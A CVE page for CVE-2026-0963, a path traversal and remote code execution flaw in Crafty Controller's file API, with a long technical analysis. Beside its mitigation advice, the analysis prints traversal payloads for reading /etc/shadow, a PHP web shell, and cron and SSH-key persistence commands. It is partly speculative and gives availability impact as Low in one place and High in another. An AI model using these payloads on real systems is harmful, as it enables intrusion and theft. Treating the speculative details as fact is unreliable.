CVE-2026-0963
CVE-2026-0963
9.9
CriticalPublished:
Last updated:
Source:cve@gitlab.com
Analyzed
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- Low
- User Interaction
- None
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- Low
Description
An input neutralization vulnerability in the File Operations API Endpoint component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.
Comprehensive Technical Analysis of CVE-2026-0963
CVE ID: CVE-2026-0963 CISA Vulnerability Name: CVE-2026-0963 CVSS Score: 9.9 (Critical) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Type
CVE-2026-0963 is a path traversal vulnerability leading to arbitrary file tampering and remote code execution (RCE) in Crafty Controller, a web-based game server management tool. The flaw resides in the File Operations API Endpoint, where improper input neutralization allows authenticated attackers to manipulate file paths, bypass access controls, and execute malicious code.
Severity Justification (CVSS 9.9 - Critical)
The Critical severity rating is justified by the following factors:
- Attack Vector (AV:N): Exploitable remotely over a network.
- Attack Complexity (AC:L): Low complexity; no specialized conditions required.
- Privileges Required (PR:L): Low privileges (authenticated user) are sufficient.
- User Interaction (UI:N): No user interaction required.
- Scope (S:C): Changes in scope (impacts beyond the vulnerable component).
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): High impact across all three security objectives.
The combination of RCE, low attack complexity, and high impact makes this a high-risk vulnerability requiring immediate remediation.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
An attacker with authenticated access to Crafty Controller can exploit this vulnerability via:
-
Path Traversal via Malicious API Requests
- The File Operations API fails to properly sanitize user-supplied input (e.g., file paths, filenames).
- Attackers can inject directory traversal sequences (e.g.,
../,%2e%2e%2f) to access restricted files outside the intended directory. - Example:
POST /api/files/read HTTP/1.1 Host: vulnerable-crafty-server Content-Type: application/json Authorization: Bearer <valid_token> { "path": "../../../../etc/passwd" }
-
Arbitrary File Write → Remote Code Execution (RCE)
- If the API allows file uploads or modifications, an attacker can:
- Overwrite critical system files (e.g.,
/etc/crontab, web server configs). - Upload malicious scripts (e.g., PHP, Python, or shell scripts) to executable directories.
- Modify server-side templates (e.g., Jinja2, Twig) to inject server-side code.
- Overwrite critical system files (e.g.,
- Example RCE via file write:
POST /api/files/write HTTP/1.1 Host: vulnerable-crafty-server Content-Type: application/json Authorization: Bearer <valid_token> { "path": "../../../../var/www/html/shell.php", "content": "<?php system($_GET['cmd']); ?>" } - The attacker can then trigger the payload via:
GET /shell.php?cmd=id HTTP/1.1 Host: vulnerable-crafty-server
- If the API allows file uploads or modifications, an attacker can:
-
Privilege Escalation via Misconfigured Permissions
- If Crafty Controller runs with elevated privileges (e.g.,
root,sudo), successful exploitation could lead to full system compromise. - Attackers may also pivot to other services (e.g., databases, internal APIs) if the server is part of a larger infrastructure.
- If Crafty Controller runs with elevated privileges (e.g.,
Exploitation Requirements
- Authentication: Valid credentials (low-privilege user account).
- Network Access: Ability to reach the Crafty Controller API endpoint.
- No User Interaction: Exploitable without victim participation.
3. Affected Systems and Software Versions
Vulnerable Software
- Crafty Controller (versions prior to 4.0.12).
- Component: File Operations API Endpoint (
/api/files/*). - Platforms: Linux, Windows, and containerized deployments (Docker).
Affected Versions
| Version Range | Vulnerable? | Fixed Version |
|---|---|---|
| < 4.0.12 | ✅ Yes | 4.0.12+ |
| 4.0.12 and above | ❌ No | - |
Detection Methods
- Manual Testing:
- Send crafted API requests with path traversal payloads (e.g.,
../../../). - Check for unexpected file access or modification.
- Send crafted API requests with path traversal payloads (e.g.,
- Automated Scanning:
- Nuclei Template:
crafty-controller-path-traversal.yaml - Burp Suite / OWASP ZAP: Fuzz API endpoints for path traversal.
- Metasploit Module: (If available, check
exploit/multi/http/crafty_controller_rce).
- Nuclei Template:
4. Recommended Mitigation Strategies
Immediate Actions
-
Apply Vendor Patch (Highest Priority)
- Upgrade to Crafty Controller v4.0.12 or later.
- Verify patch integrity via checksums or digital signatures.
-
Temporary Workarounds (If Patch Not Available)
- Disable File Operations API (if not critical for operations).
- Implement Network-Level Restrictions:
- Restrict API access to trusted IPs via firewall rules.
- Use WAF (Web Application Firewall) to block path traversal attempts (e.g., ModSecurity OWASP Core Rule Set).
- Enforce Least Privilege:
- Run Crafty Controller with minimal permissions (avoid
root). - Use chroot/jail environments to limit file system access.
- Run Crafty Controller with minimal permissions (avoid
-
Input Validation & Sanitization
- Whitelist allowed characters in file paths (e.g.,
[a-zA-Z0-9_\-\.]). - Normalize paths (resolve
../sequences before processing). - Use absolute paths and canonicalize before file operations.
- Whitelist allowed characters in file paths (e.g.,
-
Enhanced Authentication & Authorization
- Enforce MFA for API access.
- Implement rate limiting to prevent brute-force attacks.
- Audit user permissions to ensure least privilege.
-
Monitoring & Logging
- Enable detailed API logging (track suspicious file operations).
- Set up alerts for path traversal attempts (e.g.,
grep -r "\.\./" /var/log/crafty). - Deploy EDR/XDR solutions to detect post-exploitation activity.
5. Impact on the Cybersecurity Landscape
Broader Implications
-
Game Server Ecosystem Risks
- Crafty Controller is widely used for Minecraft, Valheim, and other game server management.
- Compromised servers can be used for:
- DDoS amplification (via game server bots).
- Cryptojacking (abusing server resources for mining).
- Malware distribution (hosting malicious mods/plugins).
-
Supply Chain & Third-Party Risks
- If Crafty Controller is integrated into hosting providers or cloud platforms, a single exploit could lead to mass compromise.
- Attackers may chain this vulnerability with other flaws (e.g., weak credentials, misconfigurations).
-
Regulatory & Compliance Concerns
- GDPR, CCPA, HIPAA: Unauthorized data access/modification may lead to legal penalties.
- PCI DSS: If payment data is stored on the same server, this could result in non-compliance.
-
Threat Actor Interest
- APT Groups: May exploit this for lateral movement in targeted attacks.
- Ransomware Operators: Could use RCE to deploy ransomware (e.g., LockBit, BlackCat).
- Initial Access Brokers (IABs): May sell access to compromised servers on dark web forums.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Snippet (Hypothetical Example):
# Crafty Controller API (vulnerable version) @app.route('/api/files/read', methods=['POST']) def read_file(): data = request.get_json() file_path = data.get('path') # No sanitization! with open(file_path, 'r') as f: # Direct file access return f.read() - Issue: The API blindly trusts user input without validating or sanitizing the
pathparameter. - Exploitation: An attacker can traverse directories using
../sequences.
Exploit Development (Proof of Concept)
- Identify Target Endpoint:
- Use Burp Suite or Postman to interact with
/api/files/reador/api/files/write.
- Use Burp Suite or Postman to interact with
- Craft Malicious Payload:
- Read Sensitive Files:
{ "path": "../../../../etc/shadow" } - Write Malicious File (RCE):
{ "path": "../../../../var/www/html/rce.php", "content": "<?php system($_GET['cmd']); ?>" }
- Read Sensitive Files:
- Execute Payload:
- Trigger the uploaded script via:
GET /rce.php?cmd=id HTTP/1.1 Host: target
- Trigger the uploaded script via:
Post-Exploitation Techniques
- Privilege Escalation:
- Check for SUID binaries (
find / -perm -4000 2>/dev/null). - Exploit kernel vulnerabilities (e.g., Dirty Pipe, CVE-2021-4034).
- Check for SUID binaries (
- Persistence:
- Add cron jobs (
echo "* * * * * root /tmp/backdoor.sh" >> /etc/crontab). - Modify SSH keys (
echo "ssh-rsa AAAAB3NzaC1yc2E..." >> ~/.ssh/authorized_keys).
- Add cron jobs (
- Lateral Movement:
- Dump credentials (
cat /etc/passwd,ls -la /home/*/.ssh/). - Pivot to internal networks (e.g., via
ssh,smbclient).
- Dump credentials (
Detection & Forensics
- Log Analysis:
- Look for unusual file access patterns in
/var/log/crafty/api.log. - Check for newly created/modified files (
find / -type f -mtime -1).
- Look for unusual file access patterns in
- Memory Forensics:
- Use Volatility to detect malicious processes (
pslist,malfind).
- Use Volatility to detect malicious processes (
- Network Forensics:
- Analyze PCAPs for unexpected outbound connections (e.g., reverse shells).
Conclusion & Recommendations
CVE-2026-0963 represents a critical risk to organizations using Crafty Controller, enabling authenticated attackers to achieve RCE with minimal effort. Given the high CVSS score (9.9), immediate action is required:
- Patch Immediately (upgrade to v4.0.12+).
- Isolate Vulnerable Instances if patching is delayed.
- Monitor for Exploitation Attempts (WAF, EDR, SIEM).
- Conduct a Post-Exploitation Review to ensure no compromise occurred.
Security teams should prioritize this vulnerability in their remediation efforts, as it poses a significant threat to both confidentiality and system integrity.
References: